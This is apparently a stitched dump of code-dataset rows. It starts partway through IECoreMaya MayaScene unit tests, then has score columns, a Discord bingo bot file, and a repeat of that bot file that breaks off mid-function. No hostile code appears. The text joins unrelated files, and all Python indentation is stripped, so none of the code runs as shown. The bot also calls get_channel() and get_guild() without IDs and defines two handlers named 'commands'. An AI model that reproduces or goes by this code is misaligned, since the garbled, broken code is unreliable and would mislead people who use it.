maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( str( scene.name() ), "/" )
self.assertEqual( str( sphere1.name() ), "pSphere1" )
self.assertEqual( str( sphere2.name() ), "pSphere2" )
self.assertEqual( str( sphere3.name() ), "pSphere3" )
def testPaths( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( scene.path(), [] )
self.assertEqual( sphere1.path(), [ "pSphere1" ] )
self.assertEqual( sphere2.path(), [ "pSphere1", "pSphere2" ] )
self.assertEqual( sphere3.path(), [ "pSphere1", "pSphere3" ] )
def testSceneMethod( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
self.assertEqual( str( scene.scene( ["pSphere1"] ).name() ), "pSphere1" )
# does it still return absolute paths if we've gone to another location?
scene = scene.scene( ["pSphere1"] )
self.assertEqual( str( scene.scene( [] ).name() ), "/" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere2"] ).name() ), "pSphere2" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere3"] ).name() ), "pSphere3" )
self.assertEqual( scene.scene( ["idontexist"], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
self.assertRaises( RuntimeError, IECore.curry( scene.scene, ["idontexist"] ) )
def testHasObject( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasObject(), False )
self.assertEqual( child.hasObject(), True )
def testReadTransformMethods( self ) :
# create a little hierarchy
transfromythingy = maya.cmds.createNode( "transform", name="transform1" )
maya.cmds.setAttr( "transform1.tx", 0.1 )
maya.cmds.setAttr( "transform1.ty", 0.2 )
maya.cmds.setAttr( "transform1.tz", 0.3 )
maya.cmds.setAttr( "transform1.rx", 0.1 )
maya.cmds.setAttr( "transform1.ry", 0.2 )
maya.cmds.setAttr( "transform1.rz", 0.3 )
maya.cmds.setAttr( "transform1.sx", 0.1 )
maya.cmds.setAttr( "transform1.sy", 0.2 )
maya.cmds.setAttr( "transform1.sz", 0.3 )
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.parent( "pSphere1", "transform1" )
maya.cmds.setAttr( "pSphere1.tx", 1 )
maya.cmds.setAttr( "pSphere1.ty", 2 )
maya.cmds.setAttr( "pSphere1.tz", 3 )
maya.cmds.setAttr( "pSphere1.rx", 10 )
maya.cmds.setAttr( "pSphere1.ry", 20 )
maya.cmds.setAttr( "pSphere1.rz", 30 )
maya.cmds.setAttr( "pSphere1.sx", 4 )
maya.cmds.setAttr( "pSphere1.sy", 5 )
maya.cmds.setAttr( "pSphere1.sz", 6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "transform1" ).child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0.0sec" )
transform = transformChild.readTransform( 0 ).value
import math
self.assertAlmostEqual( transform.translate.x, 1, 5 )
self.assertAlmostEqual( transform.translate.y, 2, 5 )
self.assertAlmostEqual( transform.translate.z, 3, 5 )
self.assertAlmostEqual( transform.rotate.x * 180.0 / math.pi, 10.0, 5 )
self.assertAlmostEqual( transform.rotate.y * 180.0 / math.pi, 20.0, 5 )
self.assertAlmostEqual( transform.rotate.z * 180.0 / math.pi, 30.0, 5 )
self.assertAlmostEqual( transform.scale.x, 4, 5 )
self.assertAlmostEqual( transform.scale.y, 5, 5 )
self.assertAlmostEqual( transform.scale.z, 6, 5 )
self.assertEqual( transform.transform, transformChild.readTransformAsMatrix( 0 ) )
def testTimeException( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# move to frame -1:
maya.cmds.currentTime( -1 )
# test it returns the correct transform in local space
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.5 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 1.0 ) )
def testAnimatedTransform( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0sec" )
transform0 = transformChild.readTransform( 0 ).value
maya.cmds.currentTime( "0.5sec" )
transform0_5 = transformChild.readTransform( 0.5 ).value
maya.cmds.currentTime( "1sec" )
transform1 = transformChild.readTransform( 1 ).value
self.assertEqual( transform0.translate, IECore.V3d( 1, 2, 3 ) )
self.assertAlmostEqual( transform0_5.translate.x, 2.5, 5 )
self.assertAlmostEqual( transform0_5.translate.y, 3.5, 5 )
self.assertAlmostEqual( transform0_5.translate.z, 4.5, 5 )
self.assertEqual( transform1.translate, IECore.V3d( 4, 5, 6 ) )
def testDeletedDagPath( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
maya.cmds.delete( "pSphere1" )
self.assertRaises( RuntimeError, IECore.curry( child.child, "pSphereShape1" ) )
self.assertRaises( RuntimeError, child.childNames )
self.assertRaises( RuntimeError, IECore.curry( child.hasChild, "asdd" ) )
self.assertRaises( RuntimeError, child.name )
self.assertRaises( RuntimeError, child.path )
self.assertRaises( RuntimeError, child.hasObject )
self.assertRaises( RuntimeError, IECore.curry( child.readBound, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readObject, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransformAsMatrix, 0.0 ) )
# this doesn't need to throw an exception does it?
self.assertEqual( child.scene( [ "pSphere1", "pSphereShape1" ], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
# I guess this does...
self.assertRaises( RuntimeError, IECore.curry( child.scene, [ "pSphere1", "pSphereShape1" ] ) )
def testReadMesh( self ) :
# create a cube:
maya.cmds.polyCube( name = "pCube1" )
# transform a bit, so we can check it's returning the mesh in world space:
maya.cmds.setAttr( "pCube1.tx", 0.1 )
maya.cmds.setAttr( "pCube1.ty", 0.2 )
maya.cmds.setAttr( "pCube1.tz", 0.3 )
maya.cmds.setAttr( "pCube1.rx", 10 )
maya.cmds.setAttr( "pCube1.ry", 20 )
maya.cmds.setAttr( "pCube1.rz", 30 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at time 0:
maya.cmds.currentTime( "0.0sec" )
mesh = cube.readObject( 0 )
vertList = list( mesh["P"].data )
# check it's got the right length:
self.assertEqual( len( vertList ), 8 )
# check it's got the right verts:
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, -0.5 ) ), 1 )
# check read primvars
self.assertEqual( mesh["P"], cube.readObjectPrimitiveVariables( [ "P" ], 0 )["P"] )
def testAnimatedMesh( self ) :
cube = maya.cmds.polyCube( name = "pCube1" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube1.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at different times:
maya.cmds.currentTime( "0.0sec" )
mesh0 = cube.readObject( 0 )
maya.cmds.currentTime( "0.5sec" )
mesh0_5 = cube.readObject( 0.5 )
maya.cmds.currentTime( "1.0sec" )
mesh1 = cube.readObject( 1 )
# have we moved vertex 0?
self.assertEqual( mesh0["P"].data[0].x, -0.5 )
self.assertEqual( mesh0_5["P"].data[0].x, -1 )
self.assertEqual( mesh1["P"].data[0].x, -1.5 )
def testReadBound( self ) :
# create some cubes:
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.polyCube( name = "pCube2" )
maya.cmds.polyCube( name = "pCube3" )
maya.cmds.polyCube( name = "pCube4" )
maya.cmds.parent( "pCube2", "pCube1" )
maya.cmds.parent( "pCube3", "pCube1" )
maya.cmds.setAttr( "pCube4.tx", 3 )
maya.cmds.setAttr( "pCube4.ty", 3 )
maya.cmds.setAttr( "pCube4.tz", 3 )
maya.cmds.setAttr( "pCube2.tx", 1 )
maya.cmds.setAttr( "pCube2.ty", 1 )
maya.cmds.setAttr( "pCube2.tz", 1 )
maya.cmds.setAttr( "pCube3.tx", -1 )
maya.cmds.setAttr( "pCube3.ty", -1 )
maya.cmds.setAttr( "pCube3.tz", -1 )
scene = IECoreMaya.MayaScene()
cube4Transform = scene.child( "pCube4" )
cube1Transform = scene.child( "pCube1" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( scene.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 3.5, 3.5, 3.5 ) ) )
self.assertEqual( cube4Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
# check it's including its children:
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
maya.cmds.setAttr( "pCube1.tx", 1 )
maya.cmds.setAttr( "pCube1.ty", 1 )
maya.cmds.setAttr( "pCube1.tz", 1 )
# should be in object space!!!
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
cube2Transform = cube1Transform.child( "pCube2" )
self.assertEqual( cube2Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
cube3Transform = cube1Transform.child( "pCube3" )
self.assertEqual( cube3Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedMeshBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube2" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube2.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube2" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.createNode( "transform", name = "pCube1Parent" )
maya.cmds.parent( "pCube1", "pCube1Parent" )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="0sec", v=0 )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube1Parent" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.0, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( -0.5, 0.5, 0.5 ) ) )
def testCameraTransform( self ) :
# camera must be output with an identity transform, because of the hierarchical
# nature of this class...
scene = IECoreMaya.MayaScene()
cameraTransform = scene.child( "persp" )
maya.cmds.currentTime( "0.0sec" )
camera = cameraTransform.readObject( 0 )
# sanity check: camera transform is not identity?
self.assertNotEqual( cameraTransform.readTransformAsMatrix( 0 ), IECore.M44f() )
# this transform must be identity...
self.assertEqual( camera.getTransform().transform(), IECore.M44f() )
def testMeshChange( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
sphere = scene.child( "pSphere1" )
maya.cmds.currentTime( "0.0sec" )
mesh = sphere.readObject( 0 )
# should default to 382 verts:
self.assertEqual( len( mesh["P"].data ), 382 )
maya.cmds.setAttr( "polySphere1.subdivisionsAxis", 3 )
maya.cmds.setAttr( "polySphere1.subdivisionsHeight", 3 )
mesh = sphere.readObject( 0 )
# should be 8 verts now:
self.assertEqual( len( mesh["P"].data ), 8 )
def testWriteExceptions( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, IECore.curry( scene.writeBound, IECore.Box3d(), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeTransform, IECore.M44dData( IECore.M44d() ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeAttribute, "asdfs", IECore.BoolData( False ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeObject, IECore.SpherePrimitive(), 0.0 ) )
def testSceneShapeCustomReaders( self ):
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
envShape = str( IECoreMaya.FnSceneShape.create( "ieScene1" ).fullPathName() )
envNode = 'ieScene1'
envScene = scene.child( envNode )
self.assertFalse( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
maya.cmds.setAttr( envShape+'.file', 'test/IECore/data/sccFiles/environment.lscc',type='string' )
self.assertTrue( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
spheresShape = str( IECoreMaya.FnSceneShape.create( "ieScene2" ).fullPathName() )
spheresNode = 'ieScene2'
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
self.assertEqual( set( scene.childNames() ).intersection([ envNode, spheresNode ]) , set( [ envNode, spheresNode ] ) )
self.assertTrue( IECore.LinkedScene.linkAttribute in envScene.attributeNames() )
self.assertEqual( envScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/environment.lscc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( envScene.hasObject() )
spheresScene = scene.child( spheresNode )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( spheresScene.hasObject() )
# expand the scene
fnSpheres = IECoreMaya.FnSceneShape( spheresShape )
fnSpheres.expandAll()
self.assertFalse( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
leafScene = spheresScene.child("A").child("a")
self.assertTrue( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
# When expanding, we connect the child time attributes to their scene shape parent time attribute to propagate time remapping. When checking for time remapping, the scene shape
# currently only checks the direct connection, so we have here time in the link attributes. Will have to look out for performance issues.
self.assertEqual( leafScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData([ 'A', 'a' ]), 'time':IECore.DoubleData( 0 ) } ) )
self.assertFalse( leafScene.hasObject() )
# expand scene to meshes
fnSpheres.convertAllToGeometry()
self.assertFalse( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertTrue( leafScene.hasObject() )
self.assertTrue( isinstance( leafScene.readObject(0), IECore.MeshPrimitive) )
# test time remapped scene readers...
spheresShape = str( maya.cmds.createNode( 'ieSceneShape' ) )
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
maya.cmds.setAttr( spheresShape+'.time', 24.0*10 )
spheresScene = scene.child( 'ieScene3' )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData(), "time":IECore.DoubleData(10.0) } ) )
def testReadRootAttribute( self ):
maya.cmds.file( new=True, f=True )
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
# tests a bug where calling attributeNames at the root raised an exception
scene.attributeNames()
def testCustomTags( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
doTest = True
def hasMyTags( node, tag, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return False
if tag not in ( "renderable", "archivable" ) :
return False
if tag == "archivable" :
return True
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return False
if not ( tagFilter & IECore.SceneInterface.TagFilter.LocalTag ) :
return False
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return False
return dagPath.fullPathName().endswith("Shape")
def readMyTags( node, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return []
result = [ "archivable" ]
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return result
if tagFilter & IECore.SceneInterface.TagFilter.LocalTag and dagPath.apiType() == maya.OpenMaya.MFn.kMesh :
result.append( "renderable" )
return result
IECoreMaya.MayaScene.registerCustomTags( hasMyTags, readMyTags )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertFalse( scene.hasTag( 'renderable' ) )
self.assertFalse( scene.hasTag( 'archivable' ) )
self.assertEqual( scene.readTags(), [] )
self.assertFalse( transformScene.hasTag( 'renderable' ) )
self.assertTrue( transformScene.hasTag( 'archivable' ) )
self.assertEqual( transformScene.readTags(), [ IECore.InternedString('archivable') ] )
self.assertEqual( set(sphereScene.readTags()), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( set(sphereScene.readTags( IECore.SceneInterface.TagFilter.EveryTag )), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( sphereScene.readTags( IECore.SceneInterface.TagFilter.AncestorTag ), [ IECore.InternedString('archivable') ] )
self.assertTrue( sphereScene.hasTag( 'renderable') )
self.assertTrue( sphereScene.hasTag( 'archivable') )
# Disable custom tag functions so they don't mess with other tests
doTest = False
def testCustomAttributes( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
maya.cmds.currentTime( "0sec" )
doTest = True
def myAttributeNames( node ) :
if not doTest:
return []
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return ["transformAttribute"]
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return []
return ["shapeAttribute"]
def readMyAttribute( node, attr ) :
if not doTest:
return None
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
if attr == "shapeAttribute":
return None
return IECore.FloatData( 5 )
if attr == "transformAttribute":
return None
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return None
return IECore.StringData("mesh")
IECoreMaya.MayaScene.registerCustomAttributes( myAttributeNames, readMyAttribute )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertEqual( scene.attributeNames(), [] )
self.assertEqual( scene.readAttribute("anyAttr", 0.0), None )
self.assertEqual( transformScene.attributeNames(), [ IECore.InternedString("transformAttribute") ] )
self.assertEqual( transformScene.hasAttribute("shapeAttribute"), False )
self.assertEqual( transformScene.readAttribute("shapeAttribute", 0.0), None )
self.assertEqual( transformScene.readAttribute( "transformAttribute", 0.0), IECore.FloatData(5) )
self.assertEqual( sphereScene.attributeNames(), [ IECore.InternedString('shapeAttribute') ] )
self.assertEqual( sphereScene.readAttribute( "shapeAttribute", 0.0), IECore.StringData("mesh") )
# Disable custom attribute functions so they don't mess with other tests
doTest = False
if __name__ == "__main__":
IECoreMaya.TestProgram( plugins = [ "ieCore" ] ) | 0.311322 | 0.251492 |
import discord
from discord.ext.commands import Bot as BotBase
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from lib.bingo import Bingo
import asyncio
PREFIX = "-"
OWNER_IDS = []
class Bot(BotBase):
def __init__(self):
self.PREFIX = PREFIX
self.ready = False
self.guild = None
self.scheduler = AsyncIOScheduler()
super().__init__(command_prefix=PREFIX, owner_ids=OWNER_IDS)
def run(self, version):
self.VERSION = version
with open("lib/bot/token.0", "r", encoding="utf-8") as tf:
self.TOKEN = tf.read()
print("running bot...")
super().run(self.TOKEN, reconnect=True)
async def on_connect(self):
print("bot connected")
async def on_disconnect(self):
print("bot disconnected")
async def on_ready(self):
if (not self.ready):
self.ready = True
self.stdout = self.get_channel()
self.guild = self.get_guild()
await self.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
print("bot ready")
await self.change_presence(activity=discord.Game('-commands'))
else:
print("bot reconnected")
bot = Bot()
board = Bingo()
@bot.command(name='green')
async def green(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.greenUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is already green!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a green square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from red to green!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='red')
async def red(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.redUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is always green and cannot be changed to red!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a red square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from green to red!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='showboard')
async def showboard(ctx):
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='commands')
async def commands(ctx):
myEmbed = discord.Embed(title="Commands", description="Last updated 6/27/2021", color=0x00ff00)
myEmbed.add_field(name="Current Version", value=bot.VERSION, inline=False)
myEmbed.add_field(name="-green <letter> <square>", value="Change square on the board to green", inline=False)
myEmbed.add_field(name="-red <letter> <square>", value="Change square on the board to red", inline=False)
myEmbed.add_field(name="-showboard", value="Displays current board", inline=False)
myEmbed.add_field(name="-starttime", value="Shows when the current board was generated", inline=False)
myEmbed.add_field(name='-newboard', value='Creates a new board and discards the old one, cannot be undone', inline=False)
myEmbed.set_author(name="bendy")
await bot.stdout.send(embed=myEmbed)
@bot.command(name='starttime')
async def commands(ctx):
await bot.stdout.send(f'The current board was generated on {board.getStartDate()} at {board.getStartTime()} UTC.')
@bot.command(name='newboard')
async def newBoard(ctx):
await bot.stdout.send('This will create a new board which discards the old one and can NOT be undone, are you sure? (y/n)')
try:
message = await bot.wait_for('message', check=lambda m: m.author == ctx.author and m.channel == ctx.channel, timeout=30.0)
except asyncio.TimeoutError:
await bot.stdout.send('Response timed out, aborting.')
else:
if (message.content.lower() == 'y'):
await bot.stdout.send('Creating new board...')
global board
board.reset()
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
elif (message.content.lower() == 'n'):
await bot.stdout.send('The old board will be preserved')
else:
await bot.stdout.send('Response not recognized, aborting.') | lib/bot/__init__.py | import discord
from discord.ext.commands import Bot as BotBase
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from lib.bingo import Bingo
import asyncio
PREFIX = "-"
OWNER_IDS = []
class Bot(BotBase):
def __init__(self):
self.PREFIX = PREFIX
self.ready = False
self.guild = None
self.scheduler = AsyncIOScheduler()
super().__init__(command_prefix=PREFIX, owner_ids=OWNER_IDS)
def run(self, version):
self.VERSION = version
with open("lib/bot/token.0", "r", encoding="utf-8") as tf:
self.TOKEN = tf.read()
print("running bot...")
super().run(self.TOKEN, reconnect=True)
async def on_connect(self):
print("bot connected")
async def on_disconnect(self):
print("bot disconnected")
async def on_ready(self):
if (not self.ready):
self.ready = True
self.stdout = self.get_channel()
self.guild = self.get_guild()
await self.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
print("bot ready")
await self.change_presence(activity=discord.Game('-commands'))
else:
print("bot reconnected")
bot = Bot()
board = Bingo()
@bot.command(name='green')
async def green(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.greenUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is already green!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a green square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from red to green!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='red')
async def red(ctx, letter, square: int):
if (square < 1 or square > 5):
await bot.stdout.send('Square not recognized, valid args are 1-5 inclusive.')
return
result = board.redUpdate(letter, square)
if (result < 0):
await bot.stdout.send('The free space is always green and cannot be changed to red!')
elif (result < 1):
await bot.stdout.send(f'{letter.upper()} {square} is already a red square!')
else:
await bot.stdout.send(f'{letter.upper()} {square} was succesfully changed from green to red!')
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='showboard')
async def showboard(ctx):
await bot.stdout.send(file=discord.File('lib/bingo/BINGOedit.png'))
@bot.command(name='commands')
async def commands(ctx):
myEmbed = discord.Embed(title="Commands", description="Last updated 6/27/2021", color=0x00ff00)
myEmbed.add_field(name="Current Version", value=bot.VERSION, inline=False)
myEmbed.add_field(name="-green <letter> <square>", value="Change square on the board to green", inline=False)
myEmbed.add_field(name="-red <letter> <square>", value="Change square on the board to red", inline=False)
myEmbed.add_field(name="-showboard", value="Displays current board", inline=False)
myEmbed.add_field(name="-starttime", value="Shows when the current board was generated", inline=False)
myEmbed.add_field(name='-newboard', value='Creates a new board and discards the old one, cannot be undone', inline=False)
myEmbed.set_author(name="bendy")
await bot.stdout.send(embed=myEmbed)
@bot.command(name='starttime')
async def commands(ctx):
